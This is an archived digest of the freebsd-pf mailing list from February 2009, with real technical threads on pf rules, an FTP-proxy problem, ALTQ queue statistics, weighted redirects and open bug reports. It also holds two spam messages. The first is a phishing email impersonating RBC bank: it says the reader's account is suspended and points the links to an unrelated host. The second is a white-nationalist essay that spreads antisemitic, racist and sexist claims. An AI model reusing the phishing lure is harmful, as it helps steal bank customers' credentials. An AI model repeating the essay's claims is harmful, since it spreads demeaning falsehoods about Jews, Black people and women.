From owner-freebsd-pf@FreeBSD.ORG Sun Feb 15 14:21:02 2009 Return-Path: Delivered-To: pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id BB0001065722 for ; Sun, 15 Feb 2009 14:21:02 +0000 (UTC) (envelope-from anonymous@jecoro.nl) Received: from jecoro.nl (cp.jecoro.nl [80.69.95.161]) by mx1.freebsd.org (Postfix) with ESMTP id 346D88FC14 for ; Sun, 15 Feb 2009 14:21:02 +0000 (UTC) (envelope-from anonymous@jecoro.nl) Received: (qmail 21975 invoked by uid 398); 15 Feb 2009 13:51:07 -0000 Date: 15 Feb 2009 13:51:07 -0000 Message-ID: <20090215135107.21973.qmail@jecoro.nl> To: pf@freebsd.org X-PHP-Script: tullepetaonestad.nl/webcalendar/includes/mailer.php for 77.35.33.241 From: RBC bank Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: important notice X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: importantnotice@rbc.com List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 15 Feb 2009 14:21:03 -0000 RBC Financial Group [1]Contact Information Online Services Security [2]Help > [3]Important Notices [icon_information.gif] Changes to the online banking site On February 14, you'll notice some new features when you sign in to online banking. On the Home page, there will be navigation tabs giving you easy access to your other RBC online accounts We advice you to take a tour on the demo. Click below for demo image below: [4][olb_globalnav_eng.gif] Changes to the online banking site will affect your online banking account and we have suspended your account until such time that it can be safely restored by you because your RBC online account may have been compromised. To restore your account, click here : [5]https://www.royalbank.com/cgi-bin/rbaccess/ In addition, as you navigate through the site, you'll see links in the upper right corner giving you quick access to: * Customer Support * Help with this page * Edit Profile These updates are part of our commitment to finding better ways to help meet your financial needs. _________________________________________________________________ Last modified: 14/02/2009 20:40:48 References 1. javascript:kiosk_OpenWinRTB( 'https://www.rbcroyalbank.com/onlinebanking/signin/contactus.html?RefURL=https://www1.royalbank.com/cgi-bin/rbaccess/rbcgi3m01', 'CONTACT', kiosk_Type2X, kiosk_Type2Y, kiosk_Type2R ) 2. javascript:kiosk_OpenWinRTB( 'https://www.rbcroyalbank.com/onlinebanking/help.html', 'HELP', kiosk_Type3X, kiosk_Type3Y, kiosk_Type3R ) 3. http://www.volunteers-wow.net/rbc3/rbc3/rbc3/rbc3/rbc3/index.html 4. http://www.volunteers-wow.net/rbc3/rbc3/rbc3/rbc3/rbc3/index.html 5. http://www.volunteers-wow.net/rbc3/rbc3/rbc3/rbc3/rbc3/index.html From owner-freebsd-pf@FreeBSD.ORG Sun Feb 15 21:00:04 2009 Return-Path: Delivered-To: freebsd-pf@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 24BAC106564A for ; Sun, 15 Feb 2009 21:00:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id E560B8FC15 for ; Sun, 15 Feb 2009 21:00:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n1FL03Uj004642 for ; Sun, 15 Feb 2009 21:00:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n1FL0398004641; Sun, 15 Feb 2009 21:00:03 GMT (envelope-from gnats) Date: Sun, 15 Feb 2009 21:00:03 GMT Message-Id: <200902152100.n1FL0398004641@freefall.freebsd.org> To: freebsd-pf@FreeBSD.org From: Oleg S Cc: Subject: Re: kern/130977: [netgraph][pf] kernel panic trap 12 on user connect to VPN server X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Oleg S List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 15 Feb 2009 21:00:04 -0000 The following reply was made to PR kern/130977; it has been noted by GNATS. From: Oleg S To: bug-followup@FreeBSD.org, darkibot@gmail.com Cc: Subject: Re: kern/130977: [netgraph][pf] kernel panic trap 12 on user connect to VPN server Date: Sun, 15 Feb 2009 22:25:05 +0200 More detailed: in pf firewall should be rule like: pass in quick proto tcp from any to (self) port 25 flags S/SA keep state e.g. system crash in case in firewall present '(self)' macro From owner-freebsd-pf@FreeBSD.ORG Mon Feb 16 02:26:26 2009 Return-Path: Delivered-To: freebsd-pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 345651065676 for ; Mon, 16 Feb 2009 02:26:26 +0000 (UTC) (envelope-from dirk.r.gently@gmail.com) Received: from rv-out-0506.google.com (rv-out-0506.google.com [209.85.198.230]) by mx1.freebsd.org (Postfix) with ESMTP id 09D718FC16 for ; Mon, 16 Feb 2009 02:26:25 +0000 (UTC) (envelope-from dirk.r.gently@gmail.com) Received: by rv-out-0506.google.com with SMTP id f6so1525792rvb.43 for ; Sun, 15 Feb 2009 18:26:25 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=Ibzb+wzak3SikuV7oo7hqDvq0kVrysjYNW7ke3GuANk=; b=oeUdnKBYujx+awoxAGC1GMTeGAZmmWIa05UeKgVLaEBy2G4WjbJmeIMoScdv3SmQjF uURogoddcJxonJ7+KCG2D+RxBDy1wEPjFlID5kmtrV5u3WxW0PrfHGIcg9JY18a04e1S gxp30s1vwXFoBc4W+Uxurw8+rvwunvGkH5CuA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=H6JzP2NtXd+rnEkL+5dyXK8J7Cwe9pF45wOfwCIYIenE8vAUH6O/oQjaxAuBpe2J45 pnEsidMwUSa7r/SDJlood++TxYydVcFY2HCam1h077Rp7ysRuAwAkPyA2Z8be+l6VODG H4hxDJRbR6hDgBye8ejBdLVaqCCn32NaMttp8= MIME-Version: 1.0 Received: by 10.142.223.4 with SMTP id v4mr1520112wfg.11.1234749700939; Sun, 15 Feb 2009 18:01:40 -0800 (PST) Date: Sun, 15 Feb 2009 20:01:40 -0600 Message-ID: <3f4330ce0902151801t436e266j560fcc900d5a1c74@mail.gmail.com> From: "Dirk R. Gently" To: freebsd-pf@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: pf blocking ftp on firewall/router, what did I overlook? X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 16 Feb 2009 02:26:26 -0000 Thanks for taking the time to read this. I've tried to fix this but am unsure how to do it. Any help would be appreciated. I built a basic pf.conf for a machine to act as a router/firewall. The problem I'm having is that the pf.conf I built is blocking access to ftp. I've built in ftp-proxy but if I understand itcorrectly ftp-proxy allows lan clients through the firewall, what about the router itself? Without this, I'm unable to update unless I turn off the firewall. Here's my pf.conf: # Network Interface Cards (NIC)s. WAN_NIC="gem0" LAN_NIC="re0" FTPPORT="8021" table persist file "/etc/pfblocked.conf" set block-policy drop set loginterface $WAN_NIC set require-order yes scrub in all nat on $WAN_NIC from !($WAN_NIC) to any -> ($WAN_NIC:0) nat-anchor "ftp-proxy/*" rdr-anchor "ftp-proxy/*" rdr on $LAN_NIC inet proto tcp from $LAN_NIC:network to any port ftp -> lo0 port $FTPPORT set skip on lo0 antispoof log for { lo0 $WAN_NIC $LAN_NIC } block drop in log (all) quick on $WAN_NIC from to any block in log on $WAN_NIC all anchor "ftp-proxy/* pass out on $WAN_NIC proto tcp from ($WAN_NIC) to any $SYNSTATE pass out on $WAN_NIC proto udp from ($WAN_NIC) to any pass out on $WAN_NIC inet proto icmp from ($WAN_NIC) to any I've tested this and pfctl -nf /etc/pf.conf is ok. Any thoughts? -- Dirk R. Gently - http://linuxtidbits.wordpress.com/ From owner-freebsd-pf@FreeBSD.ORG Mon Feb 16 11:06:57 2009 Return-Path: Delivered-To: freebsd-pf@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id ED8C81065695 for ; Mon, 16 Feb 2009 11:06:57 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id D9C528FC1A for ; Mon, 16 Feb 2009 11:06:56 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n1GB6uJA096218 for ; Mon, 16 Feb 2009 11:06:56 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n1GB6u6j096214 for freebsd-pf@FreeBSD.org; Mon, 16 Feb 2009 11:06:56 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 16 Feb 2009 11:06:56 GMT Message-Id: <200902161106.n1GB6u6j096214@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: freebsd-pf@FreeBSD.org Cc: Subject: Current problem reports assigned to freebsd-pf@FreeBSD.org X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 16 Feb 2009 11:07:00 -0000 Note: to view an individual PR, use: http://www.freebsd.org/cgi/query-pr.cgi?pr=(number). The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130977 pf [netgraph][pf] kernel panic trap 12 on user connect to o conf/130381 pf [rc.d] [pf] [ip6] ipv6 not fully configured when pf st o kern/129861 pf [pf] [patch] Argument names reversed in pf_table.c:_co o kern/129060 pf [pf] [tun] pf doesn't forget the old tun IP o kern/127920 pf [pf] ipv6 and synproxy don't play well together o conf/127814 pf [pf] The flush in pf_reload in /etc/rc.d/pf does not w o conf/127511 pf [patch] /usr/sbin/authpf: add authpf folders to BSD.ro o kern/127439 pf [pf] deadlock in pf o kern/127345 pf [pf] Problem with PF on FreeBSD7.0 [regression] o kern/127121 pf [pf] [patch] pf incorrect log priority o kern/127042 pf [pf] [patch] pf recursion panic if interface group is o kern/125467 pf [pf] pf keep state bug while handling sessions between s kern/124933 pf [pf] [ip6] pf does not support (drops) IPv6 fragmented o kern/124364 pf [pf] [panic] Kernel panic with pf + bridge o kern/122773 pf [pf] pf doesn't log uid or pid when configured to o kern/122014 pf [pf] [panic] FreeBSD 6.2 panic in pf o kern/121704 pf [pf] PF mangles loopback packets o kern/120281 pf [pf] [request] lost returning packets to PF for a rdr o kern/120057 pf [pf] [patch] Allow proper settings of ALTQ_HFSC. The c o bin/118355 pf [pf] [patch] pfctl(8) help message options order false o kern/114567 pf [pf] [lor] pf_ioctl.c + if.c o kern/114095 pf [carp] carp+pf delay with high state limit o kern/111220 pf [pf] repeatable hangs while manipulating pf tables s conf/110838 pf [pf] tagged parameter on nat not working on FreeBSD 5. o kern/103283 pf pfsync fails to sucessfully transfer some sessions o kern/103281 pf pfsync reports bulk update failures o kern/93825 pf [pf] pf reply-to doesn't work o sparc/93530 pf [pf] Incorrect checksums when using pf's route-to on s o kern/92949 pf [pf] PF + ALTQ problems with latency o kern/82271 pf [pf] cbq scheduler cause bad latency 30 problems total. From owner-freebsd-pf@FreeBSD.ORG Mon Feb 16 21:05:16 2009 Return-Path: Delivered-To: freebsd-pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 681101065674 for ; Mon, 16 Feb 2009 21:05:16 +0000 (UTC) (envelope-from jaikat@email.unc.edu) Received: from mxpm.isis.unc.edu (mxp2.isis.unc.edu [152.2.2.160]) by mx1.freebsd.org (Postfix) with ESMTP id 0C17A8FC33 for ; Mon, 16 Feb 2009 21:05:15 +0000 (UTC) (envelope-from jaikat@email.unc.edu) Received: from smtp.unc.edu (smtpsrv2.isis.unc.edu [152.2.2.250]) by mxp2.isis.unc.edu (8.14.1/8.14.1) with ESMTP id n1GJplZg014021 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT) for ; Mon, 16 Feb 2009 14:51:47 -0500 Received: from [152.2.128.241] (aikat-lt.cs.unc.edu [152.2.128.241]) (authenticated bits=0) by smtp.unc.edu (8.14.3/8.14.3) with ESMTP id n1GJplDA017709 for ; Mon, 16 Feb 2009 14:51:47 -0500 (EST) Message-ID: <4999C3CC.9040306@email.unc.edu> Date: Mon, 16 Feb 2009 14:51:40 -0500 From: Jay Aikat Organization: University of North Carolina at Chapel Hill User-Agent: Thunderbird 2.0.0.19 (Windows/20081209) MIME-Version: 1.0 To: freebsd-pf@freebsd.org Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Proofpoint-Virus-Version: vendor=fsecure engine=1.12.7400:2.4.4, 1.2.40, 4.0.166 definitions=2009-02-16_10:2009-02-10, 2009-02-16, 2009-02-16 signatures=0 X-Proofpoint-Spam-Details: rule=uncdefault_notspam policy=uncdefault score=0 spamscore=0 ipscore=0 phishscore=0 bulkscore=0 adultscore=0 classifier=spam adjust=0 reason=mlx engine=5.0.0-0811170000 definitions=main-0902160136 Subject: real-time queue stats every 5 sec X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 16 Feb 2009 21:05:16 -0000 Hi, I am looking for an option, if there is one, with pfctl logging queue stats in real time. My pf.conf file has the following: altq on $ext_if1 priq bandwidth 622Mb qlimit 65535 queue { tcp_q1 } queue tcp_q1 on $ext_if1 qlimit 65535 priq (default) I can see updated queue stats every 5 seconds with pfctl -s queue -v -v But is there an existing option to change this update to say a different delta of time? I need updates every sec if not every millisecond. I have looked at pflogd output, but I don't see a way to distinguish which packets are queued and which ones are just passed on. Thanks in advance for your help. --Jay. From owner-freebsd-pf@FreeBSD.ORG Mon Feb 16 21:25:41 2009 Return-Path: Delivered-To: freebsd-pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id DE09B106566C for ; Mon, 16 Feb 2009 21:25:41 +0000 (UTC) (envelope-from ivanatora@gmail.com) Received: from mail-bw0-f170.google.com (mail-bw0-f170.google.com [209.85.218.170]) by mx1.freebsd.org (Postfix) with ESMTP id 6A10A8FC16 for ; Mon, 16 Feb 2009 21:25:41 +0000 (UTC) (envelope-from ivanatora@gmail.com) Received: by bwz18 with SMTP id 18so4214569bwz.19 for ; Mon, 16 Feb 2009 13:25:40 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:cc:content-type :content-transfer-encoding; bh=GvAMjSCoyrgLAoRD8AfM2+P43jn7hx6MSAcDEPpkZZw=; b=CusULFqB5RpUY6oHogeJ/p+mtuVjJGu9ge+gFFAcqLHDHo2S66UT34egYFj1GswcQk 7zcxcaCr6qj9rbrfIhatanl9izgEVOx/t/USNypCr6BdBsJY0vKg1A+kp8hXbHePmHEY dqwBqE5jPFAgbCaaEPlr3iqUjTYeiFOMW/Xr8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type:content-transfer-encoding; b=U/HyuB4on3HCisLszMHQGDQnPl3CTvp4wxjp+5jxnI7I43AVTBKAztUc8HpAxREMZh 5usMM3waYm+8FlpuVYe9WJ9vq3DyOLRvVafeoyAiUF6HuBOSMU3mKgq2j2OONECkQvId dRsow9DUGVe6oYZG1LIVVf66aEfNTuRMcbBzc= MIME-Version: 1.0 Received: by 10.223.114.208 with SMTP id f16mr4054851faq.91.1234819540167; Mon, 16 Feb 2009 13:25:40 -0800 (PST) In-Reply-To: <4999C3CC.9040306@email.unc.edu> References: <4999C3CC.9040306@email.unc.edu> Date: Mon, 16 Feb 2009 23:25:40 +0200 Message-ID: From: Ivan Petrushev To: Jay Aikat Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: freebsd-pf@freebsd.org Subject: Re: real-time queue stats every 5 sec X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 16 Feb 2009 21:25:42 -0000 Check out `pftop`. It can display various stats from the packet filter. On screen number 6 or 7 you can see your queues in a nice tree-like hierarchial structure with current rate assigned and maximum bandwidth. On Mon, Feb 16, 2009 at 9:51 PM, Jay Aikat wrote: > Hi, > I am looking for an option, if there is one, with pfctl logging queue > stats in real time. > > My pf.conf file has the following: > altq on $ext_if1 priq bandwidth 622Mb qlimit 65535 queue { tcp_q1 } > queue tcp_q1 on $ext_if1 qlimit 65535 priq (default) > > I can see updated queue stats every 5 seconds with > pfctl -s queue -v -v > > But is there an existing option to change this update to say a different > delta of time? I need updates every sec if not every millisecond. > > I have looked at pflogd output, but I don't see a way to distinguish which > packets are queued and which ones are just passed on. Thanks in advance for > your help. > --Jay. > _______________________________________________ > freebsd-pf@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-pf > To unsubscribe, send any mail to "freebsd-pf-unsubscribe@freebsd.org" > From owner-freebsd-pf@FreeBSD.ORG Wed Feb 18 12:43:35 2009 Return-Path: Delivered-To: freebsd-pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 91BD9106566B for ; Wed, 18 Feb 2009 12:43:35 +0000 (UTC) (envelope-from artis.caune@gmail.com) Received: from fg-out-1718.google.com (fg-out-1718.google.com [72.14.220.159]) by mx1.freebsd.org (Postfix) with ESMTP id 228D18FC18 for ; Wed, 18 Feb 2009 12:43:34 +0000 (UTC) (envelope-from artis.caune@gmail.com) Received: by fg-out-1718.google.com with SMTP id l26so696080fgb.35 for ; Wed, 18 Feb 2009 04:43:34 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=Jzmt4KqrOjW3BmOeMeuE0e7EpZIJV3nWN0pDEDhxsEs=; b=U9zH6oTXNtGn0WEdR/sQU3oIMWyBbXF8MlslwhCKuIN+lbpjZZTBBLjb+tpX0XDyMA mOWSQ4jXWiLwPLRrBUoMV6xwu2GgX0D29xfZpW4GAsT1XZ2ShXh+J3Y130u6vLnh42zu w5hq1VSwYW0slBX7dREacrQxkD3dJg1gW3/18= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=Fid4ClTAnbR6DeWgNhAaOUHoavAP8/aar8S9gp1BUeJoxNfrJD6fFNJ5yu7jberqBZ C7L+jv4ip/YsiEOqk+E7YjRyvRRXF8JoNaxs5dczPuYHQxjZ1KyAhPVpwWEAdTMk3BFT VaCHsVYCDxdU31fm1+GTv/lcwmrBSJBkP0XjU= MIME-Version: 1.0 Received: by 10.86.92.4 with SMTP id p4mr2728506fgb.36.1234959694219; Wed, 18 Feb 2009 04:21:34 -0800 (PST) Date: Wed, 18 Feb 2009 14:21:34 +0200 Message-ID: <9e20d71e0902180421h74344e8epb3dbbb35687d5c7f@mail.gmail.com> From: Artis Caune To: freebsd-pf@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Subject: weighted rrd X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 18 Feb 2009 12:43:35 -0000 Hi, I'm using redundant firewalls with carp and redirecting smtp traffic to internal cluster of boxes: mx_external = "1.1.1.1" table const { 10.0.0.1, 10.0.0.2 } rdr on $ext_if proto tcp from to $mx_external port 25 -> round-robin but problem is that some boxes are quad xeon, some old pentium 4 and I need to weight connection count on each box (jus like cisco slb weight). I can do it like this: mx_external = "1.1.1.1" mx_internal = "10.0.0.1, 10.0.0.1, 10.0.0.1, 10.0.0.1, 10.0.0.2" table const { $mx_internal } # 10.0.0.1 duplicates are skipped rdr on $ext_if proto tcp from to $mx_external port 25 -> { $mx_internal } round-robin So server 10.0.0.1 get 4 connections and server 10.0.0.2 only one. It just works, but maybe there are some nicer way of how to configure this? -- regards, Artis Caune <----. CCNA | BSDA <----|==================== <----' didii FreeBSD From owner-freebsd-pf@FreeBSD.ORG Thu Feb 19 18:55:29 2009 Return-Path: Delivered-To: freebsd-pf@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 9FECF10656F2 for ; Thu, 19 Feb 2009 18:55:29 +0000 (UTC) (envelope-from lawrence.auster@att.net) Received: from cdptpa-omtalb.mail.rr.com (cdptpa-omtalb.mail.rr.com [75.180.132.123]) by mx1.freebsd.org (Postfix) with ESMTP id 5D9678FC16 for ; Thu, 19 Feb 2009 18:55:29 +0000 (UTC) (envelope-from lawrence.auster@att.net) Received: from k4k6l ([75.191.169.91]) by cdptpa-omta06.mail.rr.com with ESMTP id <20090219185519.HOKR8858.cdptpa-omta06.mail.rr.com@k4k6l> for ; Thu, 19 Feb 2009 18:55:19 +0000 From: "Lawrence Auster" To: freebsd-pf@freebsd.org Content-Type: text/plain; charset="US-ASCII" Date: Thu, 19 Feb 2009 19:55:16 +0100 X-Priority: 3 Message-Id: <20090219185519.HOKR8858.cdptpa-omta06.mail.rr.com@k4k6l> Subject: "My race is just nothing": Some thoughts on the political psychology of women X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: lawrence.auster@att.net List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 19 Feb 2009 18:55:31 -0000 "My race is just nothing": Some thoughts on the political psychology of women By Kevin MacDonald February 19, 2009 It seems that the signs of white dispossession are everywhere these days. Edmund Connelly describes how non-Jewish whites are being pushed out of elite institutions like Harvard. An article titled “The end of white America” catalogues the lack of cultural confidence of whites these days. It quotes a student who says “To be white is to be culturally broke." Writing in vdare.com, David A. Yeagley quotes one of his female students saying “Look ... I don’t see anything about my culture to be proud of. It’s all nothing. My race is just nothing.” Yeagley notes the Cheyenne saying, “A nation is never defeated until the hearts of its women are on the ground.” And he places this in the context of the recent election in which 46% of white women voted for Obama compared to 41% of white men. These percentages are somewhat inflated because they include Jews and immigrants, such as South Asians, who are classified as white but do not identify with the European-American majority. Nevertheless, they do point to a significant gender gap. While it is certainly true that voting for McCain-Palin is not a sign of white consciousness — even implicitly, it is also the case that voting for Obama is a good sign of a lack of racial consciousness for European Americans. The good news, of course, is that a majority of white women did not vote for Obama. And, as Steve Sailer has shown for the 2004 election, if one separated out women who are married and have children, the results would show an even greater tendency to vote against Obama. Nevertheless, there is a real problem. Those of us with some acquaintance with European-Americans who do have an explicit ethnic identity and a sense of their ethnic interests are quite aware that there is a very large sex ratio imbalance at gatherings of like-minded people. The attendees are almost all male — an exception being the redoubtable Virginia Abernethy. And there are stories of men who have stopped attending meetings or who provide support only in the most furtive manner, mainly because their wives are afraid that the attitudes of their husbands could become public and ruin their social life. Making such things public is just the sort of thing that organizations like the SPLC and the ADL love to do. Judith Warner of the New York Times describes the result of an informal "email inquiry" on women's reactions to Obama. Some imagined having sex with Obama and replacing Michelle Obama as First Lady. Others imagined themselves at social engagements with Obama. All wanted deeply to have some of the Obama aura rub off on them. Warner's email contacts doubtless reflect her liberal readership, but I wouldn't be at all surprised if they are quite general, especially among white women who voted for Obama. What does an evolutionary psychologist say about all this? Parenthetically, I realize that the great majority of Americans do not believe in evolution. Nevertheless, evolutionary theory is a very powerful and scientifically credible way of looking at human behavior. It is no accident that one of the main strands of Jewish intellectual activism over the last century has been to oppose evolutionary theory as an explanatory tool in the social sciences. Darwin did indeed have a dangerous idea — dangerous to Jews because it provides a rational grounding for the ethnic identity and interests of European-derived people. The evolutionary theory of sex is one of the bedrocks of evolutionary psychology — probably accounting for half of all the research in the field. The basic idea is simple: Females invest a relatively large amount of time and energy in reproduction. In the world we evolved in, the only way for women to reproduce was to endure a 38-week pregnancy and then nurse the child for an even longer period. Even after nursing, child care was mainly a female responsibility. Because women are committed to this very large investment, they become very valuable in the mating game. And because they are valuable, they become discriminating maters: Just as a worker who puts in more time and energy is in a better bargaining position than one who puts in little time and energy, women become the choosers in the mating game. And what do women want? Women are expected to want men who have high social status. From an evolutionary perspective, such men are attractive because they may be willing to provide valuable resources that would help in supporting the mother and raising the children. (When men do contribute resources, they also become choosy, but that's another story.) And even if a wealthy man does not provide resources, he is likely to have good genes — genes that predispose his children to be successful. In any case, women do indeed prefer wealthy, high-status men. For example, a recent study found that wealthy men give women more orgasms: "The pleasure women get from making love is directly linked to the size of their partner’s bank balance." Other research shows that women are likely to choose higher status men than their husbands when they have affairs, resulting in the possibility of a lower status male helping to raise the children of a higher-status male. What about the idea that evolutionary theory implies that people should be attracted to people who are genetically like themselves? Evolutionary theory predicts that women will be attracted to men who are genetically similar to themselves compared to men who are from a different race or ethnic group. For one thing, this makes them more closely related to their own children. The problem is that this attraction to genetically similar mates is only part of the story. It must compete with the tendency to be attracted to wealthy, powerful men. And quite clearly, the phenomenon where large numbers of white women fantasize about having a relationship with Obama reflects his power and social status, not attraction to a genetically similar person. The media is a major part of the hostile elite, so it is not surprising that it has played a leading role in the idolization of Obama — the slobbering love affair between the mainstream media and Obama. It's the same role that Edmund Connelly has called attention to in his writing on the images of blacks created by Hollywood in recent decades. Black action heroes are now household names, and more than one commentator has pointed out that there were several black presidents in the movies and on television long before Obama was elected. These images from the media tap into women's psychological attraction to high-status males. It was probably fairly common for white women to fantasize about having sex with Will Smith or Denzel Washington or even the "wise and saintly" Morgan Freeman long before the world had ever heard of Barack Obama. Another sex difference that contributes to women's political behavior is that women are generally more nurturant, affectionate, empathic, and caring than men. This is another aspect of female psychology that can easily be derived from evolutionary thinking — the vital importance of nurturing children and developing close family relationships in our evolutionary past. Thus it is not surprising that many of Judith Warner's women not only fantasize about having sex with Obama, they see themselves married to him and becoming first lady. They develop a close and caring relationship with him, or they see him as a good friend. I suppose this is also the reason why women are more likely than men to support social programs that promise to aid children and poor people. This relatively greater empathy and nurturance was certainly adaptive in a world of family groups and close relatives. But in the modern world, it can easily lead to maladaptive altruism and ignoring real dangers. For example, white women enamored of images of sexy, high-status black males are not informed by the mainstream media of the very large racial imbalance in crime, particularly black men raping white women. Another problem with women being relatively high in nurturance and empathy is that these traits are linked to greater compliance and greater inclination to seek the approval and affection of others. Again, these are very adaptive traits in the world of small groups and close relatives. But in a world dominated by elites that are hostile to the interests of whites, these traits can lead to mindless acceptance of anti-white cultural norms. Challenging social norms — even ones that are obviously against one's interests — carries a very high psychological cost to people who seek the approval and affection of others. This implies that once the intellectual and political movements described in The Culture of Critique had seized the intellectual and moral high ground, they became difficult indeed to dislodge. Challenging these norms brings accusations of moral turpitude ringing down from the most prestigious political, media and academic institutions of the society. People who seek the approval and affection of others are definitely not inclined to go there. This in turn may well be a large part of the explanation for why there are so few women at gatherings of European-Americans concerned about the future of their people and culture. This paints a fairly bleak picture. But there are some rays of hope. It is likely that at some point the gap between rhetoric and reality in American life will be so large that no one will believe what they are hearing from the hostile elites that dominate public discourse — much like the Soviet Union in the decades before its fall. When that happens, the cultural icons promoted by the media will lose their credibility and allure as well. And because of the internet, the opportunity to hear divergent opinions and become aware of information that is suppressed by the mainstream media has never been better. All around us we can see the collapse and increasing irrelevance of the old media. The internet has already created communities where prestige and social approval can be obtained completely outside the norms created by our hostile elites. And at least some of these communities are dedicated to transforming America by asserting the legitimacy of white identities and interests. The dispossession of whites is already substantial, but it promises to be a whole lot more obvious as time goes on. As whites become a minority, it is difficult to imagine that they won't develop more of a group consciousness and challenge the prevailing anti-white norms. And that includes even the more nurturant and empathic among us. Source with hyperlinks : http://www.theoccidentalobserver.net/articles/MacDonald-Women.html ------------------------------------- You or someone using your email adress is 